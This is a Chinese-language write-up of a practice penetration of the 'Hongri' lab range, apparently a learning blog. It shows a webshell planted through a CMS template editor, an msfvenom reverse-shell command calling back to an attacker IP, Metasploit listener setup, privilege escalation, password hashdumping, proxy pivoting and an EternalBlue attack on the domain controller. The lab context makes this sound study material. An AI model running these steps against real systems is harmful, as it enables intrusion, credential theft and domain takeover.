内网渗透实践——红日靶场

内网渗透实践——红日靶场

在这两个周里我通过渗透红日靶场，来具体学习了内网这头阶段的内容在此记录。

红日靶场的网络拓扑如下：

首先我们明确入侵思路即：信息收集——>尝试入侵

我们可以看到在这个网络拓扑中，DMZ为web服务器，它的操作系统为win7。这一台web服务器具有外部的公网IP地址（192.168.5.134）也具有整个域内部的内网ip，那么我们首先的思路就是拿下这一台web服务器作为我们入侵整个内网的跳板。

1.拿下web服务器

由于这个靶场的重点在与内网，web服务器的防护做的不是那么完备。入侵思路就十分清晰了，首先：

使用nmap扫描ip地址，做基础信息收集：

可以清楚看到，这个机器开启了它的80端口（tcp接口）还有同样比较敏感的139端口445端口（ms17-010）3389端口（windows远程桌面）

这里我们访问其80端口，发现是一个phpinfo()界面

以80端口为根目录查看是否能扫描出其他的网页路径。结果扫描出了phpmyadmin和beifen.rar路径。

下载beifen.rar文件查看其robots.txt文件发现了yxcms目录

打开yxcms发现这是一个未完成搭建的cms框架，初始用户名和密码直接暴露出来而且他给出提示，访问/index.php?r=admin可以访问到后台登陆页面

使用初始密码登录到后台

在其前台模处我们可以任意编辑php文件，于是我们写入一句话木马

Ren.php——>

这里借的别人的图

根据之前下载的备份文件搜索其他前台模板的文件的名字，确定我们上传的后门的文件目录。

然后打开antsword进行连接：

至此我们的渗透攻击阶段完毕。开始进行后渗透阶段。

2.反弹shell以及会话的建立

打开msfconsole

使用msfvenom生成反弹shell

具体命令：msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.131 lport=6666 -f exe > run2.exe

生成run2.exe文件然後使用antsword上傳到目標web服務器

并且在命令行使用它

在msf中使用監聽模塊：use multi/handler

设置好set paylod windows/meterpreter_reverse_tcp

如上设置监听主机和监听端口lhost和lport,192.168.5.131:6666

使用run开始监听

3.提权

直到成功创建会话，然后我们使用getuid来查看我们登陆的用户名称以及用户组，发现权限不够需要提权，于是我们使用getsystem进行提权

ps：提权方法不止一种可以合理利用各种漏洞进行提权。因为我们渗透的环境是windows操作系统，我们就可以使用windows-exploit-suggester-ns进行提权漏洞扫描和其他漏洞扫描

首先使用我们之前挂的一句话后门来查看systeminfo并保存在一个txt文件中，系统信息中包含了系统的更新信息和补丁信息。能帮助我们判断存在哪些可以利用的漏洞

于是我们利用wes进行扫描：

python wes.py "C:\Users\Honjo Ren\Desktop\sysinfo.txt" --impact "Elevation of Privilege"

查看提权漏洞：

于是我们可以到msf平台搜索相应的模块进行利用。

4.内网及系统信息搜集

一些聊胜于无的小操作，可能会有用但是至少现在我不知道有什么用。

我们可以找一个msf的hashdump模块将web主机的所有用户名密码dump出来如图：

然后随便找一个在线解密功能对密码进行解密。

然后使用enable_rdp模块开启主机3389端口。（好像一直开着？）

最后在windows上使用mstsc进行远程桌面连接：

做完以上操作后，现在开始探测内网主机，我们先使用一句话后门来查看是否存在内网网段（ipconfig /all）：

发现内网ip192.168.52.143，据此推测内网网段为192.168.52.0/24

紧接着我们就要探测内网的存活主机：

可以使用多种协议探测：icmp，syn，netbios都可以

这里我们使用netbios

在msf平台中选择相应模块，设置好扫描的网段，开始扫描，结果如下：

可以看到，有两台存活主机分别是192.168.52.138和192.168.52.141.为了更直观我们直接打DC：192.168.52.138

5.设置代理内网横向

在清晰了入侵目标以后，我们需要做的就是让kali上的更多工具能够访问到内网，我们才能更快更高效的拿下DC。

那么在此时布置代理就显得尤为重要了。首先我们选择一个反向链接所建立的会话，然后使用：

模块来设置连接，设置好会话以后run。就能建立一个路由，将信息转发。

此时路由器还没有地址，也没有做主机的端口映射于是我们就需要使用

来进行代理的布置

同时我们需要用proxychains4来进行代理的布置代理，编辑/etc/proxychains4.conf文件使得代理srvhost和srvport一致。

然后代理设置成功后就可以使用其他工具访问内网啦，只是前面要加上前缀proxychains4

进入内网后我们一样是相同的逻辑使用nmap的vuln漏洞扫描脚本进行扫描：

得出结果：

我们可以看到主机的445端口开放，主机还是windows系统很难不让人想到windows的经典漏洞永恒之蓝。

使用msf辅助扫描，查看是否存在永恒之蓝漏洞：

令人欣喜，漏洞存在且可以被利用。

那么到了最后一步，攻击！拿下DC。

这里我们仍然使用反向连接，并使用web服务器作为跳板机进行攻击。需要注意的是，在这样的设置中我们的监听主机应该设置跳板机的ip

即set lhost 192.168.52.143然后开始攻击：

最后成功建立了会话，输入shell进入命令行，搜集系统信息以同样的思路进行提权操作。

至此，域控已经被我们拿下，后渗透流程完毕。痕迹清理和权限维持暂时还不会，以后学到了再来实际操作。

耗时一个周半的内网渗透至此结束，受益匪浅。